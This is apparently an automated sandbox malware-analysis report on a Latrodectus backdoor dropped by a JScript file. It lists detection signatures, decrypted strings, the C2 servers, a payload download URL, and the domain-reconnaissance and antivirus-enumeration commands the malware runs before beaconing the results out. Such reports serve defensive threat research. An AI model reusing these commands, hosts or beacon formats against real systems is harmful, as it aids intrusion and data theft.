Windows Analysis Report
Document_a19_79b555791-28h97348k5477-3219g9.js

Overview

General Information

Sample name: Document_a19_79b555791-28h97348k5477-3219g9.js
Analysis ID: 1431885
MD5: 3f4ddf670c98e5b0656415286e42f730
SHA1: cf27b8f44467cd4ab250b74caa039340ecd97a94
SHA256: 156c0afc01a5e346b95ebdb60cea9b7046ad7a61199cd63d6ad0f4ae32a576ac
Tags: js

Detection

Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Yara detected Latrodectus
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
JavaScript file contains Antivirus product strings
PE file contains section with special chars
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Uses ipconfig to lookup or modify the Windows network settings
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Unidentified 111 (Latrodectus), Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

AV Detection

Source: 6.2.rundll32.exe.187ec850000.2.unpack Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: /c ipconfig /all
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: /c systeminfo
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: /c nltest /domain_trusts
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: /c net view /all /domain
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: /c nltest /domain_trusts /all_trusts
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: /c net view /all
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &ipconfig=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: /c net group "Domain Admins" /domain
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: /c net config workstation
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: /c whoami /groups
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &systeminfo=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &domain_trusts=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &domain_trusts_all=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &net_view_all_domain=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &net_view_all=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &net_group=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &wmic=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &net_config_ws=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &net_wmic_av=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &whoami_group=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "pid":
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "%d",
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "proc":
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "%s",
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "subproc": [
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &proclist=[
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "pid":
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "%d",
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "proc":
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "%s",
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "subproc": [
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &desklinks=[
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: *.*
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "%s"
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Update_%x
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Custom_update
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: .dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: .exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Updater
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "%s"
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: rundll32.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: "%s", %s %s
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: runnung
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: :wtfbbq
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: %s%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: files/bp.dat
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: %s\%d.dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: %d.dat
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: %s\%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: init -zzzz="%s\%s"
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: front
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: /files/
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Facial
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: !"$%&()*wp
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: .exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: POST
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: GET
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: curl/7.88.1
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: CLEARURL
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: URLS
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: COMMAND
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: ERROR
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: <html>
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: <!DOCTYPE
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: %s%d.dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: 12345
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &stiller=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: %s%d.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: LogonTrigger
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: %x%x
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: TimeTrigger
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: PT0H%02dM
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &mac=
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: %02x
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: :%02x
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: PT0S
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &computername=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: &domain=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: \*.dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: \Registry\Machine\
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: https://jarinamaers.shop/live/
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: https://wrankaget.site/live/
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: AppData
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Desktop
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Startup
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Personal
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Local AppData
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: \update_data.dat
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: URLS
Source: 6.2.rundll32.exe.187ec850000.2.unpack String decryptor: URLS|%d|%s
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 6_2_000000018003BC0C
Source: unknown HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.59.82:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr

Spreading

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\msiexec.exe File opened: z:
Source: C:\Windows\System32\msiexec.exe File opened: x:
Source: C:\Windows\System32\msiexec.exe File opened: v:
Source: C:\Windows\System32\msiexec.exe File opened: t:
Source: C:\Windows\System32\msiexec.exe File opened: r:
Source: C:\Windows\System32\msiexec.exe File opened: p:
Source: C:\Windows\System32\msiexec.exe File opened: n:
Source: C:\Windows\System32\msiexec.exe File opened: l:
Source: C:\Windows\System32\msiexec.exe File opened: j:
Source: C:\Windows\System32\msiexec.exe File opened: h:
Source: C:\Windows\System32\msiexec.exe File opened: f:
Source: C:\Windows\System32\msiexec.exe File opened: b:
Source: C:\Windows\System32\msiexec.exe File opened: y:
Source: C:\Windows\System32\msiexec.exe File opened: w:
Source: C:\Windows\System32\msiexec.exe File opened: u:
Source: C:\Windows\System32\msiexec.exe File opened: s:
Source: C:\Windows\System32\msiexec.exe File opened: q:
Source: C:\Windows\System32\msiexec.exe File opened: o:
Source: C:\Windows\System32\msiexec.exe File opened: m:
Source: C:\Windows\System32\msiexec.exe File opened: k:
Source: C:\Windows\System32\msiexec.exe File opened: i:
Source: C:\Windows\System32\msiexec.exe File opened: g:
Source: C:\Windows\System32\msiexec.exe File opened: e:
Source: C:\Windows\Installer\MSI3B6A.tmp File opened: c:
Source: C:\Windows\System32\msiexec.exe File opened: a:
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_0072AF79 FindFirstFileExW, 4_2_0072AF79
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC85A350 FindFirstFileW,FindNextFileW,LoadLibraryW, 6_2_00000187EC85A350
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC851A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 6_2_00000187EC851A08
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAEA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 7_2_00000201DAAEA350
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 7_2_00000201DAAE1A08
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A37950A350 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_000001A37950A350
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A379501A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 8_2_000001A379501A08

Networking

Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.59.82 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.136.103 443
Source: Malware configuration extractor URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor URLs: https://wrankaget.site/live/
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  Host: jarinamaers.shop
  Content-Length: 252
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  Host: jarinamaers.shop
  Content-Length: 180
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  Host: grizmotras.com
  Content-Length: 180
  Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC858D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 6_2_00000187EC858D90
Source: global traffic HTTP traffic detected: GET /ad.msi HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Windows Installer
  Host: 45.95.11.217
Source: global traffic DNS traffic detected: DNS query: jarinamaers.shop
Source: global traffic DNS traffic detected: DNS query: grizmotras.com
Source: unknown HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: jarinamaers.shop | Content-Length: 252 | Cache-Control: no-cache
Source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr String found in binary or memory: ftp://ftp%2desktop.ini
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2032880345.00000207B4E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035225115.00000207B4E01000.00000004.00000020.00020000.00000000.sdmp, Document_a19_79b555791-28h97348k5477-3219g9.js String found in binary or memory: http://45.95.11.217/ad.msi
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.95.11.217/ad.msi%
Source: ~DF428E4FF550ED71C3.TMP.2.dr String found in binary or memory: http://45.95.11.217/ad.msi-1780707424311028180
Source: ~DF3025BC11E5C97B03.TMP.2.dr, ~DFE66F7BB54D4BA8DC.TMP.2.dr, ~DFAB72B8B8E96537BE.TMP.2.dr, ~DF22CBD4461B033FB8.TMP.2.dr, ~DF0C3825C8A6AE7DC2.TMP.2.dr, inprogressinstallinfo.ipi.2.dr String found in binary or memory: http://45.95.11.217/ad.msi0
Source: wscript.exe, 00000000.00000003.2156644454.00000207B4D0A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.95.11.217/ad.msiLin
Source: wscript.exe, 00000000.00000002.2158447349.00000207B5459000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.95.11.217/ad.msiV
Source: wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.dig
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesi
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digice7
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
